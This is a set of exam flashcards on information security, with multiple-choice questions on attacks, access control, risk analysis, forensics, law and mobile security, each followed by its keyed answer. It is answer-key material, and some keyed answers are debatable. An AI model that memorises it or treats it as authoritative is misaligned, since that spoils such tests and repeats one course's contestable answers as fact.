Exam II Flashcards
Denial of service becomes more possible
- if the service is distributed to many sites that must occasionally synchronize their data.
- if the service can be accessed through several addresses, some of which can be administratively blocked in case of too many requests.
- if the security policy dictates that too many failed attempts to log in lead to a temporary lock-out.
- if the authentication of clients requires a proof-of-effort from them.
- if the security policy dictates that too many failed attempts to log in lead to a temporary lock-out.
Three of these five: Ping of Death, Ping sweep, Smurf, Spyware and SYN flood, are examples of attacks directly against confidentiality. integrity. authentication. availability.
availability.
What is an example of a cyber attack?
An insider in a technology firm doing industrial espionage for a foreign company.
A group of script kiddies trying their skills randomly and managing to launch a distributed DoS attack against a government agency.
Using social engineering to inject code to a city’s central water supply system and causing it to crash.
Terrorists causing severe damage to the infrastructure by explosives.
Using social engineering to inject code to a city’s central water supply system and causing it to crash.
A web cookie is a piece of information stored at the
web server and concerning the browser program.
web server and concerning the browsing person.
browser and concerning the browsing person.
browser and concerning the visits to the server.
browser and concerning the visits to the server.
There are three models of cloud services, SaaS, IaaS and PaaS, that is, ‘S’, ‘I’ and ‘P’ as a service, where
S=software, I=infrastructure, P=platform
S=security, I=integrity, P=process
S=safety, I=internet, P=premises
S=software, I=infrastructure, P=procedure
S=software, I=infrastructure, P=platform
Data mining is the opposite of data hiding. an attack against privacy. a method to handle big data. a method of cryptanalysis.
a method to handle big data.
Advanced persistent threat refers to
a vulnerability that has not been patched.
a threat actor with plentiful resources who has gained unauthorized access to an information system and stays undetected for an extended period of time.
a Trojan horse that applies some novel method to compromise the system where it is residing.
a zero-day vulnerability, which the finder has sold to some party other than the manufacturer or vendor who is responsible for patching it.
a threat actor with plentiful resources who has gained unauthorized access to an information system and stays undetected for an extended period of time.
When an attacker combines the methods of aggregation and inference against a large collection of data, what is he is most likely attempting to do?
Extracting sensitive information from non-sensitive data items in databases.
Abusing social media.
A known-plaintext attack against encryption.
Password cracking.
Extracting sensitive information from non-sensitive data items in databases.
What is the term used for attacks where each successful transaction benefits the attacker only very little but the number of transactions is high? email spam phishing salami attack DDoS
salami attack
In the physical information security the concept of baiting means
blackmailing with something questionable that the victim has done.
stealing a device and requesting ransom for it.
letting the victim find a curiosity-arousing media container.
causing damage to rotating memory disks by perturbing their speed.
letting the victim find a curiosity-arousing media container.
Alice cannot figure out how her colleague Bob gained unauthorized access to her information system, because Bob has little computer experience. However among the following she can easily rule out all except a covert channel. social engineering. a dictionary attack. shoulder surfing.
shoulder surfing.
An internet troll is a type of
fake news that is spreading unusually fast.
anonymous communication protocol.
author of disturbing messages.
hacker who is trying to find and sell vulnerabilites to anyone who wants to pay.
author of disturbing messages.
The concept deepfake is related to steganography. side channels in multimedia. forged video. anonymous commerce on counterfeit products.
forged video.
Which attack is based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g. cryptanalysis and software bugs)? Timing information, power consumption, electromagnetic leaks or even sound can provide a means for this. a side-channel attack implicit attack direct-access attack brute-force attack
a side-channel attack
Meet-in-the-middle is an attack type where
password hashes are broken by optimizing the use of rainbow tables.
a cryptographic algorithm is broken at about a square root of effort by working both from the start and end toward the middle.
the attacker or his process relays modified messages between two unknowing communication parties.
the statistics of the birthday paradox are simultaneously applied to identity theft of many individuals.
a cryptographic algorithm is broken at about a square root of effort by working both from the start and end toward the middle.
A birthday attack is a way to
make inferences on private personal data from social media posts.
“paradoxically” find a hash collision much faster than an input that gives a particular hash.
boost social engineering, by knowing not only the birthday of the victim but also an approaching birthday of a colleague of the victim.
crack an average person’s passwords faster in case his or her birthday is known.
“paradoxically” find a hash collision much faster than an input that gives a particular hash.
Rooting
is an attack type where an outside intruder gets administrative rights to an operating system.
is a term referring to methods of overriding the limitations of the OS for installing programs from any sources.
involves alteration of OS access controls on a computer in such a way that all users have administrative rights.
means that an attacker has been able to alter the initial operations that a computer does before the OS starts.
is a term referring to methods of overriding the limitations of the OS for installing programs from any sources.
A root kit is
a term referring to methods of breaking the limitations of the OS for installing programs from various sources.
is a set of tools for breaking the DRM limitations of multimedia software with respect to viewing, copying and modifying content.
a collection of software tools which - after getting to a computer - allow the attacker to access the machine with root privileges.
the common name for versions of a computer virus that attaches to one of the supervisor or kernel modules.
a collection of software tools which - after getting to a computer - allow the attacker to access the machine with root privileges.
Which two of these statements are true? (i) Only about one-fifth of computer viruses come from optical disks, memory sticks, and other storage media (ii) Files with .bat and .pif as name extensions can contain malware. (iii) Antivirus software vendors update virus identification databases usually a few times an hour. (iv) A memory-based virus scan program is constantly running and scans the programs before they start.
(ii) & (iv)
(i) & (iv)
(ii) & (iii)
(i) & (iii)
(ii) & (iv)
Which two of these claims are true? (i) More than a quarter of computer viruses come from optical disks, memory sticks, and other removable media. (ii) Files with .scr and .pif as name extensions can contain malware. (iii) Antivirus software vendors usually have to update virus identification data twice a week. (iv) Heuristic-based antivirus software does not need to be updated as often as software that is based on traditional scanning.
(ii) & (iii)
(ii) & (iv)
(i) & (iii)
(i) & (iv)
(ii) & (iv)
None of the following is a definition of a buffer overflow, but which one best describes it?
The program counter, i.e. the address of the next instruction to be executed, is moved forward by one, even if it is already in the last instruction of the subroutine.
It is always a security threat because an attacker can use it to cause evil - at least a program crash.
A memory reference made by a program points to another process’s memory area.
A number larger than the array size is used to index the array, and the operating system does not block this reference.
A number larger than the array size is used to index the array, and the operating system does not block this reference.
Only depending on their context, a sequence of bits in the memory of a computer can mean either data or instructions. This can lead to attacks of type impersonation. injection. buffering. bit rot.
injection.
A covert channel
is a way of communicating that is hidden from the access control mechanisms.
was originally meant for transmitting inaudible signals between computer peripherals but was deprecated since attackers found a way to abuse it.
refers to a data transfer mechanism that an attacker has enabled between computer processes even if it should have been disabled according to the security policy.
is a performance-optimizing design that allows data flow through a common kernel process serving different users.
is a way of communicating that is hidden from the access control mechanisms.
Assume that two processes compete for a shared resource. If they cooperate in such a way that the system's security policy is violated, the situation is called a race condition. object reuse. a covert channel. denial of service.
a covert channel.
Assume a web site allows users to input data that other users retrieve later. If those data are not intended to be executed by the retrieving browsers, but this still happens, the input validation has failed to prevent a cross-site scripting. cross-site request forgery. malicious file execution. database injection.
cross-site scripting.
Race condition is
a low level vulnerability in program code, usually at the OS kernel level.
the situation where a denial of service has already happened but not to all processes.
a situation where two processes can raise their privilege wrongly to compete for more resources.
a situation where two processes try to access a single resource at the same time and the resulting sequence of accesses may be wrong.
a situation where two processes try to access a single resource at the same time and the resulting sequence of accesses may be wrong.
A virus can do nothing if its code is just read but not run. Why then does the MS-Word macro virus start, even if the document containing it is only read from disk to Word?
An infected document contains program code that Word runs after reading the document.
The virus is memory-resident and infects documents when they are opened.
An infected document contains program code which, when read into Word, causes a buffer overflow in Word and ends up being executed after all.
The virus has also infected Word’s program code.
An infected document contains program code that Word runs after reading the document.
Threats to network communications can be summarized in five fundamental cases, one of which is the unauthorized use of a resource over the network. The other four deal with the "fate" of messages. If each of these four cases is seen as a breach of either confidentiality, integrity or availability, then there will be two cases breaching integrity. availability. both confidentiality and availability. both integrity and confidentiality.
integrity.
On which layer of the TCP/IP stack does routing operate? Physical layer. Network layer. Transport layer. Data-link layer.
Network layer.
On which layer of the TCP/IP stack does Ethernet (IEEE 802.3) operate? Physical layer. Network layer. Data-link layer. Transport layer.
Data-link layer.
A wormhole attack happens when two colluding attackers at non-adjacent locations of a (wireless) network have a direct connection and by replaying routing information cause traffic to flow through their link. This gives good opportunity to money laundering. cryptanalysis. seeing confidential data. stopping the network.
seeing confidential data.
ARP poisoning
is a result of an attacker sending fake ARP messages within a LAN.
is a result from an attacker randomly changing several MAC addresses of devices in a local network.
halts the operation of a LAN because the addresses in the ARP table point to non-existent MACs.
happens when malware corrupts the program that runs the Address Resolution Protocol.
is a result of an attacker sending fake ARP messages within a LAN.
Scanning is systematic search for something. Which of the following scans is least useful for finding targets of attack or abuse? wardialing portsweep wardriving webcrawling
webcrawling
Which of these properties is true about link encryption? (i) It is recommended for environments with high confidentiality requirements. (ii) It encrypts routing information. (iii) It provides confidentiality for traffic flow.
(ii) and (iii), but not (i)
(i) and (ii), but not (iii)
(i) and (iii), but not (ii)
(i) , (ii) and (iii)
(ii) and (iii), but not (i)
When a user runs scripts - written by an attacker - on one web page and they cause damage on another page, which the user has open in the browser, what sort of attack is happening? OWASP XSS CSRF CVE
CSRF
Besides a physical meaning the concept of access control is defined as “The process of granting or denying specific requests to obtain and use information and related information processing services”. What is the significance of the word “specific” here?
It denotes the fact that not all requests are submitted to the granting/denying process.
Without that word the defined scope would be overly large, covering all levels from the OS kernel to the application layer.
Omitting the word would not change the meaning, because all requests of the defined kind are specific in some sense.
It limits the scope of access control to the moment when the request happens - in contrast to the policy level that tells how the granting/denying process should work.
It limits the scope of access control to the moment when the request happens - in contrast to the policy level that tells how the granting/denying process should work.
Investigate the claim: As a security goal, Availability, or Usability, means that information or services are stored and accessible sooner or later. It is false because
the term usability should not be used in the same sense as the term availability.
availability requires that the data be accessed within a set time limit.
in terms of security, availability only applies to information and usability only to services.
usability also requires that the data have not changed uncontrollably.
availability requires that the data be accessed within a set time limit.
Identity is a profound concept in information systems. Count how many of the following operations can be done to it: Identity can be (i) offered as a service, (ii) changed, (iii) confiscated, (iv) stolen, (v) verified (vi) spoofed. 5 3 4 6
5
Assume Bob worked in an organization until he was terminated. Which of the following is an example of the organization’s information systems to fail with the TOCTOU principle (Time of Check/Time of Use)?
Bob causes harm in the information system, and it turns out from the logs that this happened while he was still logged in after his termination.
Bob manages to solicit new sensitive information from the organization by using his old knowledge of the organization to masquerade as a current employee.
Bob gradually damages the file system by a remote-access program he had installed while he was still an employee.
A program destroys files. It turns out that Bob had installed the program while he was still an employee, and its action was triggered when it no more saw Bob logged in within the last month.
Bob causes harm in the information system, and it turns out from the logs that this happened while he was still logged in after his termination.
The worst enemy of security may be a human being, but what is the second worst - often also called the worst? multilayerness single-levelness the weakest link in the chain none of these
none of these
An administrator grants access rights to a group of users called "HR" instead of granting rights to each member individually. This is an example of a security mechanism called layering. data hiding. abstraction. polyinstantiation.
abstraction.
The over 100 years old principle of Kerckhoffs
concerns the separate nature of an algorithm and its parameters.
is in current parlance known also as the onion (protection) principle.
has been obsoleted by the invention of public key cryptography.
says that locks are for honest people.
concerns the separate nature of an algorithm and its parameters.
The security of a mechanism shall not be based on the secrecy of its design or implementation. This is the principle of an open model. Which of the following is an example of complying with this?
A corporate network is defended by a two-tier system in which the structure of the outer and less important part of the network is clearly visible to the attacker and can misdirect him into focusing on it.
The security system is assembled from so simple modules that everyone can be assured of the security of each of them.
All publicly available URLs on a website are linked on a sitemap or other index page, but all non-public URLs require a login.
The single sign-on mechanism that allows the user to access various web services works regardless of the service implementation platform.
All publicly available URLs on a website are linked on a sitemap or other index page, but all non-public URLs require a login.
Encapsulation is a general protection idea whose applicability ranges from vaults to IPsec's encapsulating security payload (ESP), but which of the following is NOT another example of it? intrusion detection system TCP wrapper sandbox in Java Virtual Machine a VPN tunnel
intrusion detection system
The \_\_\_\_ describes the rules that need to be implemented to ensure that the security requirements are met in your organization. security policy security model reference monitor security kernel
security policy
What does accountability mean in the field of information security?
The users or their departments have to pay for the CPU and network usage, and logs are kept to enable this.
The users or their departments have to pay the costs of resolving security incidents caused by the users.
The user’s actions in the information system are recorded in log files and they are used for evaluation of the user with respect to rewards or sanctions.
The user’s actions are logged and in case of security incidences it will be known whether the user is responsible or not.
The user’s actions are logged and in case of security incidences it will be known whether the user is responsible or not.
What kind of identity is a federated identity?
The stolen identity of a victim of identity theft.
The corrected or resumed identity of a victim of identity theft.
An identity that is portable across boundaries of organizations.
The shared identity of a group of individuals acting on a common task.
An identity that is portable across boundaries of organizations.
Residual risk is a concept in risk management that
means an approximation of what is left over of risks after their treatment is done.
corresponds to measurement error in exact sciences.
defines those risks that can be safely accepted.
sets the starting point for risk assessment.
means an approximation of what is left over of risks after their treatment is done.
In choosing protection mechanisms one must take into account their applicability in different stages of the general security process. Which three stages?
policy making, threat response and remediation.
recovery, correction, and punishment of the perpetrators.
avoidance, intimidation and deterrence.
prevention, detection and response.
prevention, detection and response.
What can be considered a basic model of work in information security?
Division to the phases of prevention, detection and response.
Repeated identification of asset values and threats to them, and mitigation of risks in order of priority.
Confidentiality, integrity and availability.
Optimization to find the most economical alternative between good but expensive security measures and losses due to not using them.
Repeated identification of asset values and threats to them, and mitigation of risks in order of priority.
For mandatory access control to work the data owner must determine
a sufficient level of consensus among users.
the method of validating users’ authorization.
the users’ need to know.
the method of verifying users’ identities.
the users’ need to know.
Multilevel security is
an example of defence-in-depth.
a security model where new parts are introduced at lower assurance levels and gradually elevated to higher levels as they are evaluated.
the way how operating systems treat processes of users, running them with more or less restricted rights.
a system that simultaneously processes information at different classification levels and users with different clearance levels.
a system that simultaneously processes information at different classification levels and users with different clearance levels.
Role-based access control
is the strictest form of mandatory access control.
is implemented by considering job functions.
can be compromised by role inheritance.
does not depend on what the data owner declares.
is implemented by considering job functions.
Role-based access control, RBAC, means
an access control model that bases the access decision on pre-assigned roles of a user in relation to the requested resource.
a method to assign roles to users or revoke them in order to fulfill the security policy.
an access control model that uses such grouping of users and resources where the groups can change on the basis of previous accesses.
a method to allocate roles to users for access to various parts of the organization network.
an access control model that bases the access decision on pre-assigned roles of a user in relation to the requested resource.
CERT, Computer Emergency Response Team,
is an international company whose main task is to investigate and trace data breaches in companies.
originated in the United States and has since spread to e.g. Finland.
is a UN agency that also has offices in Finland.
in accordance with the EU directive, has also been made to operate in Finland under FICORA.
originated in the United States and has since spread to e.g. Finland.
The process of evaluating the security properties of software or a system against a set of security standards or policies is called accreditation. verification. certification. validation.
certification.
The idea of information security criteria models (e.g. Common Criteria) is mainly to
assist in the marketing of security products.
facilitate the assessment of information security.
facilitate the installation of security mechanisms.
enable automatic evaluation of products and systems with respect to security.
facilitate the assessment of information security.
One of the ISO standards 9126, 15408 and 27001 focuses on evaluation of software quality. The other two focus on information security. (i) Which is about management, and (ii) which provides evaluation criteria for IT products?
(i) 27001, (ii) 15408
(i) 15408, (ii) 27001
(i) 9126, (ii) 27001
(i) 9126, (ii) 15408
(i) 27001, (ii) 15408
An X.509 certificate is used to verify
a cryptographic key using a trusted server.
a digital signature by submitting it to a certificate authority.
the ownership of a website that uses TLS.
the binding between an identity and a cryptographic key.
the binding between an identity and a cryptographic key.
What is the offline rule for backups?
While making a backup, take your system offline, except for the connection to the backup site.
Only connect your backup to your production systems when making or retrieving the copy.
Transport your backup media physically to storage which is never online.
While making a backup to a local service or media, take your system offline.
Only connect your backup to your production systems when making or retrieving the copy.
What is the ‘3-2-1’ rule for backups?
At least 3 copies, on 2 devices, and 1 offsite.
At least 3 generations, 2 copies of each, and 1 offline.
At least 3 copies, on 2 sites, and 1 offline.
At least 3 generations, 2 copies of each, and a new copy once per day.
At least 3 copies, on 2 devices, and 1 offsite.
Intrusion detection systems use three types of information as the basis for their analysis. Which of the following is not typically included in this information?
program file checksums
characteristics of previous attacks
knowledge from previous attackers
information about current system configuration
knowledge from previous attackers
In the event of a security incidence, one of the primary objectives of the response is to ensure that
the attackers are detected and stopped.
appropriate documentation about the event is maintained as chain of evidence.
there is minimal disruption to the organization’s mission.
the affected systems are immeadiately shut off to limit the impact.
there is minimal disruption to the organization’s mission.
What should owners do to find vulnerabilities in their information systems?
Use intrusion detection techniques.
Provide a parallel version of the system for hackers to examine.
Install a root kit.
Apply automatic attack tools.
Apply automatic attack tools.
Business continuity plan together with disaster recovery plan
are a set of plans for preventing disasters.
are the set of adequate preparations and procedures for the continuation of all organization functions.
are a standard set of preparations and procedures for responding to a disaster without the need of being approved.
are a sufficient and priorly approved set of preparations and procedures for responding to a disaster.
are the set of adequate preparations and procedures for the continuation of all organization functions.
When dealing with digital evidence, the chain of custody must
never be altered.
be completely reproducible in a court of law
exist in only one location.
be compiled according to a documented process.
be compiled according to a documented process.
In an organization both disaster recovery and business continuity need a plan, and when information security is concerned the term disaster recovery commonly refers to the recovery of technology environment. manufacturing environment. personnel environments. organization operations.
technology environment.
Even if a Finnish company wants to be silent about a breach, it may have obligations to report it to
CERT Coordination Center.
anonymous police reporting service.
Finnish Communications Regulatory Authority.
To the EU Information Security Agency.
Finnish Communications Regulatory Authority.
Computer forensics can be regarded as a combination of computer science, information technology, engineering and hacker's mindset. critical thinking. the scientific method. law.
law.
To ensure proper forensic action when needed, an incident response team must
avoid conflicts of interest by ensuring that the legal council of the organization is not part of the process.
routinely create forensic images of all desktops and servers.
only promote closed incidents to law enforcement.
treat every incident as though it may be a crime.
treat every incident as though it may be a crime.
GDPR defines the concept of data subject as a person who can be identified by reference to an identifier such as a name, ..., "or to one or more factors specific to the physical, physiological, genetic, \_\_\_\_\_\_ , economic, cultural or social identity of that natural person." gender medical mental ethnic
mental
Which of the following is furthest from the main role of the company’s data protection officer?
management of access rights
processing of consents to collecting data
supervision of log data
implementing physical access control
implementing physical access control
There is legislation to promote information security. It is possible to violate it even if you don’t do or have not done anything unauthorized actively. Whom can this affect?
The owner of the information when the information is illegal.
An organization that neglects to take care of information security.
A private person on whose computer a bot agent is sending spam.
A government official who intends to disclose confidential material.
An organization that neglects to take care of information security.
A digital signature improves the handwritten signature in many ways, but it does not increase
assurance on the signed content not having been altered.
trust on the time when the signature was made.
assurance on the identity of the signer.
the number of people who can get assured of its validity.
trust on the time when the signature was made.
A digital signature is not legally valid if it is technically verified, but
a signatory declares that he has done so in error.
a new signature subsequently revokes it.
the signed electronic information has been altered.
the signatory no longer has the instrument he used to make the signature.
the signed electronic information has been altered.
The issuer of the Citizen certificate, for instance on the Finnish identity card, must comply with the Certificate Policy,
the details of which are trade secrets.
which is a public document drawn up by the issuer.
which is part of Finnish legislation.
which is not part of the law but is common to all issuers of the Citizen certificates.
which is a public document drawn up by the issuer.
Two complementary viewpoints in information security are: (i) people can be protected from information or (ii) information from people. Which among the following is the most common example of (ii)?
Unprotected and unrestricted information would block telecommunication networks.
Information that is freely available elsewhere is not wanted somewhere in the world.
Information may become unreliable if accessed by too many.
One does not want to give access to the information for free.
One does not want to give access to the information for free.
Two complementary viewpoints in information security are: (i) people can be protected from information or (ii) information from people. Which among the following is the most common example of (i)?
Unsolicited bulk email is effectively filtered at several stages between the senders and receivers.
Information that is freely available elsewhere is not wanted somewhere in the world.
Information may become harmfully unreliable if modified by too many.
Big web shops like Amazon have effective recommendation mechanisms that filter out most uninteresting items.
Unsolicited bulk email is effectively filtered at several stages between the senders and receivers.
None of the following is a comprehensive definition of e-commerce. What is the most comprehensive?
Money is transferred in bits.
Products are digital.
Trading takes place automatically without human interaction.
The trading parties meet mainly in a way other than face to face or through paperwork.
The trading parties meet mainly in a way other than face to face or through paperwork.
What is a mule , when used in relation to information security?
Malware, where an exceptionally high proportion of the code is carrying the harmful payload.
A person assisting in money laundering, perhaps without realizing it himself.
The server in ransomware botnets, that is handling the payments.
A person, knowingly or not, carrying an implanted processor that is used for spying through a wireless connection.
A person assisting in money laundering, perhaps without realizing it himself.
If the security concerns of publishers of web pages are divided into four categories, which of the following covers them best?
availability of pages, authenticity of pages, protection of copyright, liability.
availability of pages, integrity of pages, getting proper compensation, being able to take care of responsibilities.
page authenticity, page integrity, customer authenticity, liability.
confidentiality of pages, integrity of pages, obtaining appropriate compensation, bearing responsibilities.
availability of pages, integrity of pages, getting proper compensation, being able to take care of responsibilities.
What kinds of payment systems are the Finnish Siirto, Swedish Swish and Danish MobilePay?
localized versions of an American system
credit based
insecure unless used within a VPN connection to one’s own bank.
working without the payer knowing the payee’s account number
working without the payer knowing the payee’s account number
You can have many things filled in automatically or predictively in messages that you write in various systems. In general, what should you be most wary of, when using such filling facilities? embarrassing words passwords obscene smileys or emojis names of unrelated persons
passwords
In your new IoT gadget, i.e. in the appliance that joins the Internet of Things, what is the most likely weakness with respect to information security?
A spy module set up by the importer based on regulations of the Finnish authorities.
Default password that you didn’t change.
Unfiltered power cord that allows easy side channel attacks.
The connection to a server network that collects not only statistics but personal usage data.
Default password that you didn’t change.
If you want to have a wireless dashboard for your electric sockets and lamp switches at home, you might end up letting outsiders interfere with your appliances. Which connection is the best in this respect? Wifi ZigBee Bluetooth NFC (Near field communication)
ZigBee
Imagine a near-future situation where you carry a common neuroimplant that interacts with your consciousness, but is also connected to the outside world by itself. What is the most likely weakness with respect to information security?
An attacker may find a backdoor in the software and start affecting the way you think.
The gadget may fail to improve the quality of your life in the intended way.
If one of its tasks is to ration out medicine, an attacker may cause a DoS to this function by simply overloading the communication channel with traffic.
The connection may leak personal information to false receivers or through security holes in the supporting information system.
The connection may leak personal information to false receivers or through security holes in the supporting information system.
A job announcement for professor in Cyber security (Oulu 2020) outlines the research problem area this way: “Traditional thinking in system development may have considered trust as an afterthought: data is processed by various devices and actors in the system, supply chain is long and complicated, _______ and trust and privacy is upheld by either attempting to anonymize the data or applying strong access controls.” What belongs to the slot?
regulations are poorly understood
data persist forever
cryptographic protections are frequently broken
customers demand open-access data
data persist forever
A job announcement for professor in Cyber security (Oulu 2020) outlines the research field in this way: "Traditional thinking in system development may have considered trust as an afterthought: ... ... Opposite thinking would be to focus data collection, keeping data and its processing \_\_\_\_, simplifying and securing each step in processing and expiring collected data as swiftly as possible." What belongs to the slot? encrypted public local distributed
local
What does it mean in terms of usability, if one of the goals in the design of a secure system is to make abuse really difficult?
The system will not be optimal with respect to other security goals.
The goal has very little to do with usability.
It is likely that usability for allowed use is not impaired, and good user-experience improves the opportunity for success in the security design.
The system is likely to become unusable.
It is likely that usability for allowed use is not impaired, and good user-experience improves the opportunity for success in the security design.
Your browser displays a page and navigates to a new page without using a link on the original page (that is, you enter an address or use a bookmark). In this case, a different server that has the new page does not know which page you came from. What else does the server not know in this case?
Your machine’s or proxy’s IP address.
The cookie it sent during your previous visit.
Your email address.
Whether your browser can display JPEG images.
Your email address.
All of the following are related to ethical hacking, but which one makes it actually ethical?
Agreement with the target.
Adherence to its purpose by the hacker.
Supervision by a representative of the target organization.
Education and skill
Adherence to its purpose by the hacker.
You receive an email with an attachment from a person that you know. The email is digitally signed but your email client cannot verify the signature. What is the best course of action?
Determine why the signature cannot be verified before opening the attachment.
Delete the email.
Forward the email to another address with a new signature.
Open the attachment to determine if the signature is valid.
Determine why the signature cannot be verified before opening the attachment.
There are several ways, how an attacker can make money from your misspelling a URL. Many kinds of phishing and malware are some ways but which is not a way?
Through a botnet she collects statistics on misspellings of popular sites and their pages, and sells these data to the site owners.
Advertising revenue from ads on the pages with the misspelled URL, owned by the attacker.
The attacker owns the misspelled URL and sells but doesn’t deliver to you something you thought you were buying at the correct URL.
The attacker redirects traffic from his misspelled URL to the correct site through a real affiliate site, and earns a commission for each real purchase. (The correct site pays to its affiliate, who pays to the attacker - or is the attacker.)
Through a botnet she collects statistics on misspellings of popular sites and their pages, and sells these data to the site owners.
Assume your cell phone stays strictly in your possession while you face an attacker well versed with 4G/5G technology, who gets to know some data concerning your phone. Which of the following revelations would most easily lead him to be able to make calls on your bill?
The secret shared between your telephone network and your SIM card
Your phone number and IMSI (International Mobile Subscriber Identity)
The key used to encrypt your call.
Your phone number and IMEI (International Mobile Equipment Identity)
The secret shared between your telephone network and your SIM card
Which of the following has the least to do with ordinary cell phone calls? key management antivirus security policy authentication
antivirus
Which of the following applies to 4G and 5G mobile phone systems? Here “the phone is authenticated” means that its SIM / USIM is authenticated.
In 5G, the phone network is authenticated to the phone, but not in 4G.
In both, the phone is authenticated to the phone network.
The phone is authenticated to the phone network in 5G, but not in 4G.
The phone is authenticated in 5G to the receiving 5G phone, but the same does not happen in 4G.
In both, the phone is authenticated to the phone network.
Which of the following applies to 4G and 5G mobile phone systems?
The call is encrypted end to end between two 5G phones, while in 4G the call is decrypted and re-encrypted in the exchanges.
The call is encrypted end-to-end between two 5G phones, while in 4G the encryption is only between the device and the base station.
Both 4G and 5G calls have encryption, but neither of them extends from end to end.
The call is encrypted in 5G but not in 4G.
Both 4G and 5G calls have encryption, but neither of them extends from end to end.
Which of the following does not apply?
Spyware can be part of an employee’s computer installation based on the employment contract.
Restricting browser-run scripts reduces the chances of spyware running.
Only government authorities have the right to find out what someone is doing or has done in the past on their computer.
Spyware that tracks user activity usually uses information sources other than the log files on the user’s machine.
Only government authorities have the right to find out what someone is doing or has done in the past on their computer.
Assume that according to a company’s new security policy, workstations may only handle work matters and all communications (including work-related) and personal use must be handled through computers in a separate room. Then, in accordance with the policy and co-operation procedure, spyware is installed on employees’ workstations, which records keyboard and pointing device operations. What is the most likely consequence?
The security of the company will be improved but only if the employees believe that the recorded data will also be monitored.
Employee privacy will be violated if the recorded data is also monitored.
The security of the company is deteriorating as employees continue to take care of personal matters at their work desks using their own equipment.
The extra load greatly reduces the efficiency of the workstation.
The security of the company will be improved but only if the employees believe that the recorded data will also be monitored.
Adware has started to mean advertising-supported software and it is very common in smart phones. An earlier meaning to the word adware and a still valid concept is
software that installs itself without the user’s knowledge and displays ads while the user browses the Internet.
an invisible element on a web page, revealing user’s presence on that page to its home site.
visualization of the source sites of web page elements.
software for augmented awareness, for instance of security threats.
software that installs itself without the user’s knowledge and displays ads while the user browses the Internet.
Information security policy is a management-approved view of the _______ of information security.
costs, responsibilities and implementation
status, resources and ways of implementation
significance, responsibilities and implementation plan
goals, principles and implementation
goals, principles and implementation
The organization’s security policy should take a position on
when the next policy update is made.
who decides on the allocation of resources to implement the policy.
how to organize the ownership of the information systems to be secured.
who is responsible for responding to security breaches.
who is responsible for responding to security breaches.
What is the relationship between Security Policy and Security Plan? (S. Plan is also called S. Program.)
Policy contains Plan.
Plan contains Policy.
Policy is an annually updated version of Plan.
Policy is made on the basis of Plan.
Plan contains Policy.
A large organization can have several security policies (=p.), and a common way to categorize them is:
standards, guidelines, and procedures
compliance p., obligatory p., recommended p.
program p., issue-specific policy, system-specific p.
internet p., data-protection p., acceptable-use p.
program p., issue-specific policy, system-specific p.
What is the correct order when building security?
security mechanisms - threat survey - security policy - risk analysis
security policy - threat survey - risk analysis - security mechanisms
threat survey - risk analysis - security policy - security mechanisms
security policy - security mechanisms - threat survey - risk analysis
threat survey - risk analysis - security policy - security mechanisms
When outsourcing IT systems,
security services cannot be outsourced with the exception of physical security, like guards.
regulatory and compliance requirements must be passed on to the provider.
the provider can take up ownership of all devices, software and data while the outsourcing organization concentrates on physical production.
security services cannot be outsourced except auditing.
regulatory and compliance requirements must be passed on to the provider.
To deserve the attribute “effective” the security management in an enterprise must
achieve full security at the lowest cost.
prioritize security for new products and send prompt answers to questions concerning the security of old products.
reduce risk to an acceptable level.
install software and hardware updates and patches as soon as they become vailable.
reduce risk to an acceptable level.
The primary security goal of \_\_\_\_ management is to ensure that changes to the hardware, software or networking in the organization's information system do not unintentionally or unknowingly diminish security. document policy user configuration
configuration
There are two main types of information system security requirements - in general, but especially according to the Common Criteria standard, namely
functional and assuring.
emphasizing either integrity and availability, or confidentiality and privacy.
related to intentional and unintentional security breaches.
active and passive.
functional and assuring.
Which of the following is less useful as a basis when determining the value of an asset during risk analysis?
The asset’s price in an external marketplace.
The initial and outgoing costs of purchasing, licensing and supporting the asset.
The asset’s importance to the organization’s production operations.
The level of insurance required to cover the asset.
The level of insurance required to cover the asset.
Organization impact analysis
is just a different term to describe risk analysis.
calculates the probability of disruptions to the organization.
establishes the effect of disruptions on the organization.
is critical to development of a business continuity plan.
establishes the effect of disruptions on the organization.
Assume you have been contracted as a security consultant to a growing medium-sized firm, where there is still no full-time security staff. One of your tasks will be business impact analysis. Which of the following should you do before the others?
Evaluate the impact of disruptive events.
Identify all business units within the organization.
Estimate the criticality of business functions.
Determine the objectives for recovery time, i.e. the allowed down-time.
Identify all business units within the organization.
The risk analysis as part of an information security process includes identification of what is valuable. Which of the following values is most relevant for this subtask?
The replacement value of its production and office equipment.
Financial assets and liabilities.
Intangible assets.
Investments in maintaining the working capacity of staff.
Intangible assets.
Pick the correct combinations of the alternate phrases: An organization will conduct a risk assessment to evaluate (i) threats to its assets, (ii) vulnerabilities {present|possible} in the environment, (iii) the likelihood that a threat will be realized by taking advantage of an {exposure|attack}, (iv) the impact that the {exposure|attack} being realized will have on the organization, (v) countermeasures {available|in use}, (vi) {total|residual} risk.
possible - exposure - exposure - in use - residual
present - exposure - exposure - available - residual
present - exposure - exposure - in use - total
present - attack - attack - available - total
present - exposure - exposure - available - residual
When assessing the risks associated with residual data in an information system, it is important to
note that a careless user may replace an existing document with an older version.
first perform overwriting on all seemingly empty space on the storage media.
understand the security requirements any data in the system.
evaluate vulnerabilities found in applications that handle sensitive files.
understand the security requirements any data in the system.
What is characteristic of qualitative risk assessment?
Difficulty of implementation unless you are very experienced with the risk assessment process.
Ease of implementation and possibility to complete by personnel that has only limited understanding of the risk assessment process.
Ease of implementation by partly automated and reasonably detailed metrics for calculation of risk.
Possiblity to complete by inexperienced personnel by using laborious but detailed metrics for calculation of risk.
Ease of implementation and possibility to complete by personnel that has only limited understanding of the risk assessment process.
Escrow is a useful concept in many contexts, but what cannot be escrowed? money public key certificates decryption keys software source code
public key certificates
